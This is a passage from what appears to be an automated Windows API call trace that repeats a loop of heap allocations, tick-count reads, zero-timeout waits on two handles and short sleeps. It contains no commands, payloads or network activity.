dwFlags=0x8, lpMem=0x32e87930 | out: hHeap=0x2150000) returned 1 [0187.379] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.379] GetTickCount () returned 0x20d5791 [0187.379] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e881a0 [0187.379] GetTickCount () returned 0x20d5791 [0187.379] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e881a0 | out: hHeap=0x2150000) returned 1 [0187.379] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.385] GetTickCount () returned 0x20d6037 [0187.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0187.385] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.385] GetTickCount () returned 0x20d6037 [0187.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87930 [0187.385] GetTickCount () returned 0x20d6037 [0187.385] GetTickCount () returned 0x20d6037 [0187.385] GetTickCount () returned 0x20d6037 [0187.385] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87930 | out: hHeap=0x2150000) returned 1 [0187.385] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.385] GetTickCount () returned 0x20d6037 [0187.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87bd0 [0187.385] GetTickCount () returned 0x20d6037 [0187.385] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87bd0 | out: hHeap=0x2150000) returned 1 [0187.385] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0187.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.390] GetTickCount () returned 0x20d68cd [0187.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.390] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.390] GetTickCount () returned 0x20d68cd [0187.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e70 [0187.390] GetTickCount () returned 0x20d68cd [0187.390] GetTickCount () returned 0x20d68cd [0187.390] GetTickCount () returned 0x20d68cd [0187.390] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87e70 | out: hHeap=0x2150000) returned 1 [0187.390] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.390] GetTickCount () returned 0x20d68cd [0187.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87810 [0187.391] GetTickCount () returned 0x20d68cd [0187.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87810 | out: hHeap=0x2150000) returned 1 [0187.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.393] GetTickCount () returned 0x20d7163 [0187.393] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0187.394] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.394] GetTickCount () returned 0x20d7163 [0187.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88140 [0187.394] GetTickCount () returned 0x20d7163 [0187.394] GetTickCount () returned 0x20d7163 [0187.394] GetTickCount () returned 0x20d7163 [0187.394] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88140 | out: hHeap=0x2150000) returned 1 [0187.394] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.394] GetTickCount () returned 0x20d7163 [0187.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ff0 [0187.394] GetTickCount () returned 0x20d7163 [0187.394] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ff0 | out: hHeap=0x2150000) returned 1 [0187.394] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0187.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.397] GetTickCount () returned 0x20d79f9 [0187.397] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0187.397] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.397] GetTickCount () returned 0x20d79f9 [0187.397] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87930 [0187.397] GetTickCount () returned 0x20d79f9 [0187.397] GetTickCount () returned 0x20d79f9 [0187.397] GetTickCount () returned 0x20d79f9 [0187.397] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87930 | out: hHeap=0x2150000) returned 1 [0187.397] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.397] GetTickCount () returned 0x20d79f9 [0187.397] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87990 [0187.397] GetTickCount () returned 0x20d79f9 [0187.397] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87990 | out: hHeap=0x2150000) returned 1 [0187.397] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0187.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.401] GetTickCount () returned 0x20d829e [0187.401] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.401] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.401] GetTickCount () returned 0x20d829e [0187.401] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f00 [0187.401] GetTickCount () returned 0x20d829e [0187.401] GetTickCount () returned 0x20d829e [0187.401] GetTickCount () returned 0x20d829e [0187.401] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f00 | out: hHeap=0x2150000) returned 1 [0187.401] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.401] GetTickCount () returned 0x20d829e [0187.401] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88290 [0187.402] GetTickCount () returned 0x20d829e [0187.402] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88290 | out: hHeap=0x2150000) returned 1 [0187.402] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.552] GetTickCount () returned 0x20d8bc1 [0187.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.552] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.552] GetTickCount () returned 0x20d8bc1 [0187.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87960 [0187.552] GetTickCount () returned 0x20d8bc1 [0187.552] GetTickCount () returned 0x20d8bc1 [0187.552] GetTickCount () returned 0x20d8bc1 [0187.552] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87960 | out: hHeap=0x2150000) returned 1 [0187.552] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.552] GetTickCount () returned 0x20d8bc1 [0187.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.553] GetTickCount () returned 0x20d8bc1 [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.714] GetTickCount () returned 0x20d9503 [0187.714] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0187.714] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.714] GetTickCount () returned 0x20d9503 [0187.714] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88bc0 [0187.714] GetTickCount () returned 0x20d9503 [0187.714] GetTickCount () returned 0x20d9503 [0187.715] GetTickCount () returned 0x20d9503 [0187.715] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88bc0 | out: hHeap=0x2150000) returned 1 [0187.715] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.715] GetTickCount () returned 0x20d9503 [0187.715] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88cb0 [0187.715] GetTickCount () returned 0x20d9503 [0187.715] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88cb0 | out: hHeap=0x2150000) returned 1 [0187.715] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0187.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.822] GetTickCount () returned 0x20d9e06 [0187.822] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.822] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.822] GetTickCount () returned 0x20d9e06 [0187.822] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e897f0 [0187.822] GetTickCount () returned 0x20d9e06 [0187.822] GetTickCount () returned 0x20d9e06 [0187.822] GetTickCount () returned 0x20d9e06 [0187.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e897f0 | out: hHeap=0x2150000) returned 1 [0187.822] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.822] GetTickCount () returned 0x20d9e06 [0187.822] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89730 [0187.822] GetTickCount () returned 0x20d9e06 [0187.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e89730 | out: hHeap=0x2150000) returned 1 [0187.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.957] GetTickCount () returned 0x20da719 [0187.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0187.957] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.957] GetTickCount () returned 0x20da719 [0187.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82bf0 [0187.957] GetTickCount () returned 0x20da719 [0187.957] GetTickCount () returned 0x20da719 [0187.957] GetTickCount () returned 0x20da719 [0187.957] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e82bf0 | out: hHeap=0x2150000) returned 1 [0187.957] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.957] GetTickCount () returned 0x20da719 [0187.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82ad0 [0187.957] GetTickCount () returned 0x20da719 [0187.958] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e82ad0 | out: hHeap=0x2150000) returned 1 [0187.958] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0187.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.060] GetTickCount () returned 0x20db01d [0188.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.060] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.060] GetTickCount () returned 0x20db01d [0188.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70050 [0188.060] GetTickCount () returned 0x20db01d [0188.060] GetTickCount () returned 0x20db01d [0188.060] GetTickCount () returned 0x20db01d [0188.060] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70050 | out: hHeap=0x2150000) returned 1 [0188.060] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.060] GetTickCount () returned 0x20db01d [0188.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70650 [0188.060] GetTickCount () returned 0x20db01d [0188.060] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70650 | out: hHeap=0x2150000) returned 1 [0188.060] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.168] GetTickCount () returned 0x20db920 [0188.168] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.168] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.168] GetTickCount () returned 0x20db920 [0188.168] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.169] GetTickCount () returned 0x20db920 [0188.169] GetTickCount () returned 0x20db920 [0188.169] GetTickCount () returned 0x20db920 [0188.169] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.169] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.169] GetTickCount () returned 0x20db920 [0188.169] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.169] GetTickCount () returned 0x20db920 [0188.169] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.169] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.173] GetTickCount () returned 0x20dc1b6 [0188.173] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.173] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.173] GetTickCount () returned 0x20dc1b6 [0188.174] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.174] GetTickCount () returned 0x20dc1b6 [0188.174] GetTickCount () returned 0x20dc1b6 [0188.174] GetTickCount () returned 0x20dc1b6 [0188.174] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.174] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.174] GetTickCount () returned 0x20dc1b6 [0188.174] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.174] GetTickCount () returned 0x20dc1b6 [0188.174] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.174] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.179] GetTickCount () returned 0x20dca5c [0188.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.179] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.179] GetTickCount () returned 0x20dca5c [0188.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.179] GetTickCount () returned 0x20dca5c [0188.179] GetTickCount () returned 0x20dca5c [0188.179] GetTickCount () returned 0x20dca5c [0188.179] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.179] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.179] GetTickCount () returned 0x20dca5c [0188.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.179] GetTickCount () returned 0x20dca5c [0188.179] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.179] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.183] GetTickCount () returned 0x20dd2f2 [0188.183] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.183] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.183] GetTickCount () returned 0x20dd2f2 [0188.183] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.183] GetTickCount () returned 0x20dd2f2 [0188.183] GetTickCount () returned 0x20dd2f2 [0188.183] GetTickCount () returned 0x20dd2f2 [0188.183] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.183] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.183] GetTickCount () returned 0x20dd2f2 [0188.183] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.183] GetTickCount () returned 0x20dd2f2 [0188.183] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.183] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.189] GetTickCount () returned 0x20ddb88 [0188.189] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0188.189] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.189] GetTickCount () returned 0x20ddb88 [0188.189] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.189] GetTickCount () returned 0x20ddb88 [0188.189] GetTickCount () returned 0x20ddb88 [0188.189] GetTickCount () returned 0x20ddb88 [0188.189] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.189] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.189] GetTickCount () returned 0x20ddb88 [0188.189] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.189] GetTickCount () returned 0x20ddb88 [0188.189] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.189] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0188.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.192] GetTickCount () returned 0x20de41e [0188.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.192] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.192] GetTickCount () returned 0x20de41e [0188.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.192] GetTickCount () returned 0x20de41e [0188.192] GetTickCount () returned 0x20de41e [0188.192] GetTickCount () returned 0x20de41e [0188.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.192] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.192] GetTickCount () returned 0x20de41e [0188.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.192] GetTickCount () returned 0x20de41e [0188.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.196] GetTickCount () returned 0x20decc3 [0188.196] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.197] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.197] GetTickCount () returned 0x20decc3 [0188.197] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.197] GetTickCount () returned 0x20decc3 [0188.197] GetTickCount () returned 0x20decc3 [0188.197] GetTickCount () returned 0x20decc3 [0188.197] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.197] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.197] GetTickCount () returned 0x20decc3 [0188.197] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.197] GetTickCount () returned 0x20decc3 [0188.197] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.197] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.200] GetTickCount () returned 0x20df559 [0188.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.200] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.200] GetTickCount () returned 0x20df559 [0188.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.200] GetTickCount () returned 0x20df559 [0188.200] GetTickCount () returned 0x20df559 [0188.200] GetTickCount () returned 0x20df559 [0188.200] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.200] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.200] GetTickCount () returned 0x20df559 [0188.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.200] GetTickCount () returned 0x20df559 [0188.200] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.200] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.204] GetTickCount () returned 0x20dfdef [0188.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.204] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.204] GetTickCount () returned 0x20dfdef [0188.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.204] GetTickCount () returned 0x20dfdef [0188.204] GetTickCount () returned 0x20dfdef [0188.204] GetTickCount () returned 0x20dfdef [0188.204] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.204] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.204] GetTickCount () returned 0x20dfdef [0188.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.204] GetTickCount () returned 0x20dfdef [0188.204] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.204] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.207] GetTickCount () returned 0x20e0685 [0188.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.207] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.207] GetTickCount () returned 0x20e0685 [0188.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.207] GetTickCount () returned 0x20e0685 [0188.207] GetTickCount () returned 0x20e0685 [0188.207] GetTickCount () returned 0x20e0685 [0188.207] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.207] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.207] GetTickCount () returned 0x20e0685 [0188.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.207] GetTickCount () returned 0x20e0685 [0188.207] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.207] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.212] GetTickCount () returned 0x20e0f2b [0188.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.213] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.213] GetTickCount () returned 0x20e0f2b [0188.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.213] GetTickCount () returned 0x20e0f2b [0188.213] GetTickCount () returned 0x20e0f2b [0188.213] GetTickCount () returned 0x20e0f2b [0188.213] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, 